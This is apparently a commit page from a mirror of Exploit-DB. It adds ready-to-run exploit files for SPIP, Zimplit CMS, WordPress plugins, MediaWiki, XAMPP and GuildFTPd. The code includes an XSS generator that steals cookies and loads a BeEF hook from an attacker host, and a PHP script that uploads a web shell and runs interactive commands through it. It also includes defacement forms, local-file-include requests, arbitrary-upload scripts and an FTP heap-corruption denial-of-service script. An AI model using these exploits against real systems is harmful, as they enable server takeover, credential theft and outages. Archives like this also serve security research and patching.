bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-06-28

Browse source 
6 new exploits
This commit is contained in:
Offensive Security 2015-06-28 05:02:56 +00:00
parent fcb4d832b3
commit 6f83383e35
8 changed files with 406 additions and 56 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
files.csv
View file

@ -6303,7 +6303,7 @@ id,file,description,date,author,platform,type,port
6735,platforms/php/webapps/6735.php,"Globsy <= 1.0 - Remote File Rewriting Exploit",2008-10-12,StAkeR,php,webapps,0
6736,platforms/php/webapps/6736.txt,"Real Estate Scripts 2008 (index.php cat) SQL Injection Vulnerability",2008-10-12,Hakxer,php,webapps,0
6737,platforms/php/webapps/6737.txt,"LokiCMS <= 0.3.4 (index.php page) Arbitrary Check File Exploit",2008-10-12,JosS,php,webapps,0
6738,platforms/windows/dos/6738.py,"GuildFTPd 0.999.8.11/0.999.14 Heap Corruption PoC/DoS Exploit",2008-10-12,dmnt,windows,dos,0
6738,platforms/windows/dos/6738.py,"GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption PoC/DoS Exploit",2008-10-12,dmnt,windows,dos,0
6739,platforms/php/webapps/6739.txt,"NewLife Blogger <= 3.0 Insecure Cookie Handling / SQL Injection Vuln",2008-10-12,Pepelux,php,webapps,0
6740,platforms/php/webapps/6740.txt,"My PHP Indexer 1.0 (index.php) Local File Download Vulnerability",2008-10-12,JosS,php,webapps,0
6741,platforms/windows/dos/6741.py,"XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service Exploit",2008-10-13,shinnai,windows,dos,0
@ -33747,3 +33747,9 @@ id,file,description,date,author,platform,type,port
37393,platforms/lin_x86/shellcode/37393.asm,"Linux/x86 - exec('/bin/dash') shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0
37394,platforms/multiple/webapps/37394.txt,"Thycotic Secret Server 8.8.000004 - Stored XSS",2015-06-26,"Marco Delai",multiple,webapps,0
37395,platforms/windows/webapps/37395.txt,"ManageEngine Asset Explorer 6.1 - Stored XSS",2015-06-26,"Suraj Krishnaswami",windows,webapps,0
37396,platforms/windows/remote/37396.txt,"XAMPP for Windows 1.7.7 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-06-13,Sangteamtham,windows,remote,0
37397,platforms/php/webapps/37397.html,"SPIP 2.x Multiple Cross Site Scripting Vulnerabilities",2012-06-13,anonymous,php,webapps,0
37398,platforms/php/webapps/37398.php,"Zimplit CMS 3.0 Local File Include and Arbitrary File Upload Vulnerabilities",2012-06-13,KedAns-Dz,php,webapps,0
37399,platforms/php/webapps/37399.php,"WordPress Evarisk Plugin 'uploadPhotoApres.php' Arbitrary File Upload Vulnerability",2012-01-14,"Sammy FORGIT",php,webapps,0
37403,platforms/php/webapps/37403.php,"WordPress Invit0r Plugin 'ofc_upload_image.php' Arbitrary File Upload Vulnerability",2012-06-14,"Sammy FORGIT",php,webapps,0
37404,platforms/php/webapps/37404.txt,"MediaWiki 1.x 'uselang' Parameter Cross Site Scripting Vulnerability",2012-06-17,anonymous,php,webapps,0

Can't render this file because it is too large.

87
platforms/php/webapps/37397.html Executable file
View file

@ -0,0 +1,87 @@
source: http://www.securityfocus.com/bid/53983/info
SPIP is prone to multiple unspecified cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Versions prior to SPIP 2.0.20, 2.1.15, and 3.0.2 are vulnerable.
Exploit generator:
------------------
<html>
<head>
<script>
function trim(s){
return s.replace(/\r\n|\r|\n|\t/g,'').replace(/^\s+/g,'').replace(/\s+$/g,'');
}
function encodeToHex(s){
var r="";
var h;
for(var c=0;c<s.length;c++){
h=s.charCodeAt(c).toString(16);
while(h.length<3) h="%"+h;
r+=h;
}
return r;
}
function generateXSS(){
var target = trim(document.getElementById("target").value);
var version = trim(document.getElementById("version").value);
var content = trim(document.getElementById("content").value);
var resultjs = "";
resultjs += "<html><body><form name='x' action='" + target + "ecrire/?exec=" + version + "' method='post'>";
resultjs += "<input type='hidden' name='exec' value='" + version + "' />";
resultjs += "<input type='hidden' name=\"x'><script>eval(unescape('" + encodeToHex(content) + "'));<\/script><input=\" value='' />";
resultjs += "</form><script>document.forms['x'].submit();<\/script></body></html>";
document.getElementById("resultjs").value = resultjs;
}
</script>
</head>
<body onload="generateXSS();">
<h2>XSS in SPIP Core <=3.0.1 or <=2.1.14 admin panel (base repair)</h2>
<p>
This XSS, non-persistent, use POST vars through admin panel.<br />
The target is the attribute "name" of an input markup hidden.<br />
This XSS work on Firefox 13, IE7, but doesn't work on Chrome.<br />
Magic_quote_gcp = Off needed.
</p>
<form action="" onsubmit="generateXSS();return false;">
<table>
<tr>
<td>URL's SPIP Targeted :</td>
<td><input id="target" type="text" value="http://target/spip/" size="70" onkeyup="generateXSS();" /></td>
</tr>
<tr>
<td>SPIP version :</td>
<td>
<select id="version" onchange="generateXSS();">
<option value="base_repair">3.0.X (up to 3.0.1 included)</option>
<option value="admin_repair">2.1.X (up to 2.1.14 included)</option>
</select>
</td>
</tr>
<tr>
<td>JavaScript code to execute :<br />(without <script> & </script> markup)</td>
<td>
<textarea cols="70" rows="10" id="content" onkeyup="generateXSS();">
alert(document.cookie);
var script = document.createElement("script");
script.type = "text/javascript";
script.src = "http://ha.ck.er.xxx/beEf.js";
document.body.appendChild(script);
&lt;/textarea&gt;
</td>
</tr>
<tr>
<td>Exploit to send to an admin : </td>
<td>
<textarea cols="70" rows="10" id="resultjs" readonly="readonly">&lt;/textarea&gt;
</td>
</tr>
</table>
</form>
</body>
</html>

191
platforms/php/webapps/37398.php Executable file
View file

@ -0,0 +1,191 @@
source: http://www.securityfocus.com/bid/53990/info
Zimplit CMS is prone to multiple local file-include vulnerabilities and an arbitrary file-upload vulnerability.
An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.
Zimplit CMS 3.0 is vulnerable; other versions may also be affected.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
###
# Title : Zimplit CMS v3.0 <= (FU/XSRF/LFI) Multiple Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com | www.inj3ct0rs.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com * www.dis9.com
# platform : php
# Type : Multiple Vulnerabilities
# Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10 (En)
# Download : [http://www.zimplit.com/order.html]
###
# <3 <3 Greetings t0 Palestine <3 <3
# Exploit's / p0c's ====>
##### Exp(1) Arbitrary File/Shell Upload =>
<!-- p0c (1) -->
<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n|==================================================|";
print "\n| Zimplit CMS v3.0 <= Arbitrary Shell Upload |";
print "\n| Provided By KedAns-Dz <ked-h[at]hotmail[.]com> |";
print "\n|==================================================|\n";
if ($argc < 2)
{
print "\nUsage : php $argv[0] [host] [path]";
print "\nExample : php $argv[0] www.p0c.tld /zimplit/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--31337\r\n";
$data .= "Content-Disposition: form-data; name=\"File\"; filename=\"k3d.php\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--31337--\r\n";
$packet = "POST {$path}/zimplit.php?action=upload&folder=editor/files HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=31337\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\n Inj3ct0rK3d-Sh3lL#";
$cmd = trim(fgets(STDIN)); # f.ex : C:\\k3d.php
if ($cmd != "exit")
{
$packet = "GET {$path}k3d.php{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n"; # for Encoded You'r Shell
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
<!-- p0c (2) -->
<form action="http://[Target]/zimplit.php?action=upload&folder=editor/files" method="post">
<input type="file" name="file" size="50"/>
<input type="hidden" name="file" />
<input type="submit" value="Upload Sh3ll/File !" />
</form>
[+] Access Shell http://[Target]/editor/files/k3d.php
[+] Access Shell http://[Target]/editor/files/{ U R Shell }.*
##### Exp(2) Edit HTML (index.html) File =>
<form action='http://[target]/zimplit.php?action=save&file=index.html' method='post'>
<textarea id="html" name="html">
<center>
<h1> HaCked By KedAns-Dz </h1>
</center>
&lt;/textarea&gt;
<input type='submit' value='Edit HTML Page'>
</form>
##### Exp(3) Add new HTML File/Page =>
<form action='http://[target]/zimplit.php?action=new&file=dz0.html' method='post'>
<textarea id="html" name="html">
<center>
<h1> HaCked By KedAns-Dz </h1>
</center>
&lt;/textarea&gt;
<input type='submit' value='Creat new HTML Page'>
</form>
##### Exp(4) Local File Include =>
<!-- p0c (1) -->
<form action='http://[target]/zimplit.php?action=load&file=../../../../../../../[ LFI ]%00' method='post'>
<input type='submit' value='Included Local File'>
</form>
<!-- p0c (2) -->
<?php
$lfi =
curl_init("http://[Target]/editor/zimplit_js.php");
curl_setopt($lfi, CURLOPT_POST, true);
curl_setopt($lfi, CURLOPT_POSTFIELDS,
array('lang'=>"../../../../../../../../[ LFI ]%00"));
curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($lfi);
curl_close($lfi);
print "$postResult";
?>
<!-- p0c (3) -->
<?php
$lfi =
curl_init("http://[Target]/editor/user.php");
curl_setopt($lfi, CURLOPT_POST, true);
curl_setopt($lfi, CURLOPT_POSTFIELDS,
array('lang'=>"../../../../../../../../[ LFI ]%00"));
curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($lfi);
curl_close($lfi);
print "$postResult";
?>
#### << ThE|End
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke
# JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Barbaros-DZ
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
#============================================================================================================

24
platforms/php/webapps/37399.php Executable file
View file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/53994/info
Evarisk plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Evarisk 5.1.5.4 is vulnerable; other versions may also be affected.
<?php
$headers = array("Content-Type: application/octet-stream");
$uploadfile="<?php phpinfo(); ?>";
$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/evarisk/include/lib/actionsCorrectives/activite/uploadPhotoApres.php?qqfile=lo.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

22
platforms/php/webapps/37403.php Executable file
View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/53995/info
Invit0r plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Invit0r 0.22 is vulnerable; other versions may also be affected.
ders = array("Content-Type: application/octet-stream");
$uploadfile="<?php phpinfo(); ?>";
$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/invit0r/lib/php-ofc-library/ofc_upload_image.php?name=lo.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

9
platforms/php/webapps/37404.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53998/info
MediaWiki is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
MediaWiki versions prior to 1.17.5, 1.18.4, and 1.19.1 are vulnerable.
http://www.example.com/wiki/Main_Page?uselang=a%27%20onmouseover=eval(alert(1))%20e=%27

110
platforms/windows/dos/6738.py
View file

@ -1,55 +1,55 @@
# GuildFTPd v0.999.8.11/v0.999.14 heap corruption PoC/DoS exploit
# GuildFTPd URL - http://www.guildftpd.com
# cwd/list heap corruption
# overwrite registers in free(): ecx, edi
#
# (x)dmnt 2008
# feel free to do shellcode
# -*- coding: windows-1252 -*-
import socket
import sys, time
evil_cwd = "/."*124
evil_dir = "X"*100
def help_info():
print ("Usage: guildd0s <host> <login> <password>\n")
print ("Note: anonymous is enought\n")
def dos_it(hostname, username, passwd):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] " + r
sock.send("user %s\n" %username)
r=sock.recv(1024)
sock.send("pass %s\n" %passwd)
r=sock.recv(1024)
print "[+] Send evil string"
sock.send("cwd %s\n" %evil_cwd)
r=sock.recv(1024)
sock.send("list %s\r\n" %evil_dir)
time.sleep(3)
sock.close()
print "[!] Now server d0s'ed/heap corrupted"
print ("\n]GuildFTPd v0.999.8.11/v0.999.14 remote heap corruption PoC/DoS exploit[")
print ("](x)dmnt 2008[\n\n")
if len(sys.argv) <> 4:
help_info()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
dos_it(hostname,username,passwd)
sys.exit(0)
# milw0rm.com [2008-10-12]
# GuildFTPd v0.999.8.11/v0.999.14 heap corruption PoC/DoS exploit
# GuildFTPd URL - http://www.guildftpd.com
# cwd/list heap corruption
# overwrite registers in free(): ecx, edi
#
# (x)dmnt 2008
# feel free to do shellcode
# -*- coding: windows-1252 -*-
import socket
import sys, time
evil_cwd = "/."*124
evil_dir = "X"*100
def help_info():
print ("Usage: guildd0s <host> <login> <password>\n")
print ("Note: anonymous is enought\n")
def dos_it(hostname, username, passwd):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] " + r
sock.send("user %s\n" %username)
r=sock.recv(1024)
sock.send("pass %s\n" %passwd)
r=sock.recv(1024)
print "[+] Send evil string"
sock.send("cwd %s\n" %evil_cwd)
r=sock.recv(1024)
sock.send("list %s\r\n" %evil_dir)
time.sleep(3)
sock.close()
print "[!] Now server d0s'ed/heap corrupted"
print ("\n]GuildFTPd v0.999.8.11/v0.999.14 remote heap corruption PoC/DoS exploit[")
print ("](x)dmnt 2008[\n\n")
if len(sys.argv) <> 4:
help_info()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
dos_it(hostname,username,passwd)
sys.exit(0)
# milw0rm.com [2008-10-12]

11
platforms/windows/remote/37396.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/53979/info
XAMPP for Windows is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xampp/perlinfo.pl/"<script>alert("XSS")</script>
http://www.example.com/xampp/cds.php/%27onmouseover=alert%28%22XSS%22%29%3E
http://www.example.com/xampp/cds.php?interpret=1&jahr=1967 and sleep(1) &titel=555-666-0606